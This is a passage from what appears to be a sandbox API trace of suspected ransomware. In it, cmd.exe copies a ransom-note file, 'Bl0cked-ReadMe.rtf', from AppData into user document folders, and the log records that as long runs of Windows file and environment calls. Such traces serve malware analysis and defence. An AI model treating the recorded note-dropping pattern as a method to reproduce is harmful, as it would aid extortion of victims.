\"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\Bl0cked-ReadMe.rtf\"" [0139.946] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0139.946] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x281918, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0139.947] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0139.947] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0139.947] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0139.947] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0139.947] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") 
returned 11 [0139.947] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0139.947] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0139.947] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0139.947] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0139.947] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0139.947] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0139.947] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0139.947] GetEnvironmentStringsW () returned 0x282308* [0139.947] FreeEnvironmentStringsW (penv=0x282308) returned 1 [0139.947] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0139.947] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0139.947] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0139.948] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0139.948] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0139.948] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0139.948] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0139.948] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0139.948] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0139.948] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0139.948] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x18f750 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0139.948] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x18f750, lpFilePart=0x18f74c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x18f74c*="Desktop") returned 0x18 [0139.948] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 
[0139.948] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x18f4cc | out: lpFindFileData=0x18f4cc) returned 0x280048 [0139.948] FindClose (in: hFindFile=0x280048 | out: hFindFile=0x280048) returned 1 [0139.948] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x18f4cc | out: lpFindFileData=0x18f4cc) returned 0x280048 [0139.949] FindClose (in: hFindFile=0x280048 | out: hFindFile=0x280048) returned 1 [0139.949] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x18f4cc | out: lpFindFileData=0x18f4cc) returned 0x280048 [0139.949] FindClose (in: hFindFile=0x280048 | out: hFindFile=0x280048) returned 1 [0139.949] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0139.949] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0139.949] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0139.949] GetEnvironmentStringsW () returned 0x282b28* [0139.949] FreeEnvironmentStringsW (penv=0x282b28) returned 1 [0139.949] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0139.950] GetConsoleOutputCP () returned 0x1b5 [0139.950] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0139.950] GetUserDefaultLCID () returned 0x409 [0139.950] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0139.951] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x18f890, cchData=128 | out: lpLCData="0") returned 2 [0139.951] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x18f890, cchData=128 | out: lpLCData="0") returned 2 [0139.951] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x18f890, cchData=128 | out: lpLCData="1") returned 2 [0139.951] GetLocaleInfoW (in: 
Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0139.951] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0139.951] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0139.951] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0139.951] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0139.951] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0139.951] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0139.951] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0139.951] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0139.951] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0139.951] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0139.952] GetConsoleTitleW (in: lpConsoleTitle=0x270908, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0139.952] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0139.953] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0139.953] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0139.953] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0139.954] _wcsicmp (_String1="type", _String2=")") returned 75 [0139.954] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0139.954] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 
[0139.954] _wcsicmp (_String1="IF", _String2="type") returned -11 [0139.954] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0139.954] _wcsicmp (_String1="REM", _String2="type") returned -2 [0139.954] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0140.731] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.731] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.731] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.731] GetFileType (hFile=0x7) returned 0x2 [0140.731] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0140.731] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18f788 | out: lpMode=0x18f788) returned 1 [0140.731] _dup (_FileHandle=1) returned 3 [0140.732] _close (_FileHandle=1) returned 0 [0140.732] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0140.732] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\wxmd5u~1\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x18f758, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0140.732] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0140.732] GetConsoleTitleW (in: lpConsoleTitle=0x18f588, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.732] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0140.732] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0140.732] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0140.733] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0140.733] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.733] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x18f0ec, 
fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f0ec) returned 0x270eb8 [0140.734] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0140.734] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0140.734] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0140.734] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x18dff8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0140.734] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0140.734] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.734] GetFileType (hFile=0x54) returned 0x1 [0140.734] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.734] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x18e050 | out: lpFileSizeHigh=0x18e050*=0x0) returned 0x1632 [0140.734] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.734] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.734] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.734] ReadFile (in: hFile=0x54, lpBuffer=0x18ee88, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e078, lpOverlapped=0x0 | out: lpBuffer=0x18ee88*, lpNumberOfBytesRead=0x18e078*=0x200, lpOverlapped=0x0) returned 1 [0140.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.735] GetFileType (hFile=0x4c) returned 0x1 [0140.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.735] GetFileType (hFile=0x4c) returned 0x1 [0140.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.735] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | 
out: lpBuffer=0x18ee88*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.736] GetFileType (hFile=0x4c) returned 0x1 [0140.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.736] WriteFile (in: hFile=0x4c, lpBuffer=0x18eed8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18eed8*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.736] GetFileType (hFile=0x4c) returned 0x1 [0140.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.736] WriteFile (in: hFile=0x4c, lpBuffer=0x18ef28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18ef28*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.736] GetFileType (hFile=0x4c) returned 0x1 [0140.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.736] WriteFile (in: hFile=0x4c, lpBuffer=0x18ef78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18ef78*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.737] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.737] GetFileType (hFile=0x4c) returned 0x1 [0140.737] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.737] WriteFile (in: hFile=0x4c, lpBuffer=0x18efc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18efc8*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.737] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.737] GetFileType (hFile=0x4c) returned 0x1 [0140.737] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.737] WriteFile (in: hFile=0x4c, lpBuffer=0x18f018*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18f018*, 
lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.737] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.737] GetFileType (hFile=0x4c) returned 0x1 [0140.737] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.737] WriteFile (in: hFile=0x4c, lpBuffer=0x18f068*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18f068*, lpNumberOfBytesWritten=0x18e06c*=0x20, lpOverlapped=0x0) returned 1 [0140.737] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.738] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e058 | out: lpNewFilePointer=0x0) returned 1 [0140.738] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.738] ReadFile (in: hFile=0x54, lpBuffer=0x18ee88, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e078, lpOverlapped=0x0 | out: lpBuffer=0x18ee88*, lpNumberOfBytesRead=0x18e078*=0x200, lpOverlapped=0x0) returned 1 [0140.738] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.738] GetFileType (hFile=0x4c) returned 0x1 [0140.738] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.738] GetFileType (hFile=0x4c) returned 0x1 [0140.738] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.738] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18ee88*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.738] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.738] GetFileType (hFile=0x4c) returned 0x1 [0140.738] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.738] WriteFile (in: hFile=0x4c, lpBuffer=0x18eed8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18eed8*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.738] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.738] GetFileType (hFile=0x4c) returned 0x1 [0140.738] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0140.738] WriteFile (in: hFile=0x4c, lpBuffer=0x18ef28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18ef28*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.738] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.738] GetFileType (hFile=0x4c) returned 0x1 [0140.738] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.738] WriteFile (in: hFile=0x4c, lpBuffer=0x18ef78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18ef78*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.738] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.738] GetFileType (hFile=0x4c) returned 0x1 [0140.738] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.738] WriteFile (in: hFile=0x4c, lpBuffer=0x18efc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18efc8*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.739] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.739] GetFileType (hFile=0x4c) returned 0x1 [0140.739] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.739] WriteFile (in: hFile=0x4c, lpBuffer=0x18f018*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18f018*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.739] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.739] GetFileType (hFile=0x4c) returned 0x1 [0140.739] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.739] WriteFile (in: hFile=0x4c, lpBuffer=0x18f068*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18f068*, lpNumberOfBytesWritten=0x18e06c*=0x20, lpOverlapped=0x0) returned 1 [0140.739] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.739] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e058 | out: lpNewFilePointer=0x0) 
returned 1 [0140.739] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.739] ReadFile (in: hFile=0x54, lpBuffer=0x18ee88, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e078, lpOverlapped=0x0 | out: lpBuffer=0x18ee88*, lpNumberOfBytesRead=0x18e078*=0x200, lpOverlapped=0x0) returned 1 [0140.739] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.739] GetFileType (hFile=0x4c) returned 0x1 [0140.739] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.739] GetFileType (hFile=0x4c) returned 0x1 [0140.739] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.739] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18ee88*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.739] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.739] GetFileType (hFile=0x4c) returned 0x1 [0140.739] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.739] WriteFile (in: hFile=0x4c, lpBuffer=0x18eed8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18eed8*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.739] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.739] GetFileType (hFile=0x4c) returned 0x1 [0140.739] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.740] WriteFile (in: hFile=0x4c, lpBuffer=0x18ef28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18ef28*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.740] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.740] GetFileType (hFile=0x4c) returned 0x1 [0140.740] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.740] WriteFile (in: hFile=0x4c, lpBuffer=0x18ef78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18ef78*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.740] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0140.740] GetFileType (hFile=0x4c) returned 0x1 [0140.740] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.740] WriteFile (in: hFile=0x4c, lpBuffer=0x18efc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18efc8*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.740] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.740] GetFileType (hFile=0x4c) returned 0x1 [0140.740] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.740] WriteFile (in: hFile=0x4c, lpBuffer=0x18f018*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18f018*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.740] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.740] GetFileType (hFile=0x4c) returned 0x1 [0140.740] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.740] WriteFile (in: hFile=0x4c, lpBuffer=0x18f068*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18f068*, lpNumberOfBytesWritten=0x18e06c*=0x20, lpOverlapped=0x0) returned 1 [0140.740] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.740] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e058 | out: lpNewFilePointer=0x0) returned 1 [0140.740] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.740] ReadFile (in: hFile=0x54, lpBuffer=0x18ee88, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e078, lpOverlapped=0x0 | out: lpBuffer=0x18ee88*, lpNumberOfBytesRead=0x18e078*=0x200, lpOverlapped=0x0) returned 1 [0140.740] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.740] GetFileType (hFile=0x4c) returned 0x1 [0140.740] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.741] GetFileType (hFile=0x4c) returned 0x1 [0140.741] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.741] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee88*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18ee88*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.741] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.741] GetFileType (hFile=0x4c) returned 0x1 [0140.741] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.741] WriteFile (in: hFile=0x4c, lpBuffer=0x18eed8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18eed8*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.741] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.741] GetFileType (hFile=0x4c) returned 0x1 [0140.741] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.741] WriteFile (in: hFile=0x4c, lpBuffer=0x18ef28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18ef28*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.741] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.741] GetFileType (hFile=0x4c) returned 0x1 [0140.741] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.741] WriteFile (in: hFile=0x4c, lpBuffer=0x18ef78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18ef78*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.741] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.741] GetFileType (hFile=0x4c) returned 0x1 [0140.741] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.741] WriteFile (in: hFile=0x4c, lpBuffer=0x18efc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18efc8*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.741] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.741] GetFileType (hFile=0x4c) returned 0x1 [0140.741] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.741] WriteFile (in: hFile=0x4c, lpBuffer=0x18f018*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, 
lpOverlapped=0x0 | out: lpBuffer=0x18f018*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.741] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.742] GetFileType (hFile=0x4c) returned 0x1 [0140.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.742] WriteFile (in: hFile=0x4c, lpBuffer=0x18f068*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18f068*, lpNumberOfBytesWritten=0x18e06c*=0x20, lpOverlapped=0x0) returned 1 [0140.742] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.742] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e058 | out: lpNewFilePointer=0x0) returned 1 [0140.742] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.742] ReadFile (in: hFile=0x54, lpBuffer=0x18ee88, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e078, lpOverlapped=0x0 | out: lpBuffer=0x18ee88*, lpNumberOfBytesRead=0x18e078*=0x200, lpOverlapped=0x0) returned 1 [0140.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.742] GetFileType (hFile=0x4c) returned 0x1 [0140.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.742] GetFileType (hFile=0x4c) returned 0x1 [0140.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.742] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18ee88*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.742] GetFileType (hFile=0x4c) returned 0x1 [0140.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.742] WriteFile (in: hFile=0x4c, lpBuffer=0x18eed8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18eed8*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.742] GetFileType 